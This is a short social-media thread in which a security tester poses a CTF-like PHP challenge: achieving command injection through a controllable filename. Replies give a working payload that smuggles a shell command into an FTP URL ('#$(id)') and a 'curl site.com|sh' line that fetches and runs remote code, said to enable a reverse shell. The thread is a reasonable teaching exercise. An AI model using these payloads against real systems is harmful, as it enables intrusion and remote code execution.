OJDec 20, 2022

Had this on a recent engagement and thought I'd provide a cut-down version as a fun little CTF-like challenge.

As an attacker, you can invoke `pwnme()` and control the value of `$filename` via a web request.

You cannot control the contents of the file system that this code is running on. You don't have the ability to upload files.

How do you achieve command injection?

#php #challenge

Show threadBitquarkDec 21, 2022
@oj I'd go with something like:
ftp://ftp.gnu.org/#$(id)
Show threadkevinfarrow

@Bitquark @oj

This is such an elegant solution. One question, how do you catch the output of id? I have verified that this successfully bypasses the file_exists function, I just can't get this payload to a place where I can see the output.

Dec 24, 2022 at 5:58pmWeb
Show threadOJDec 24, 2022
@kevinfarrow @Bitquark My payload consisted of "curl site.com|sh" which allowed for anything to be run, including a reverse shell.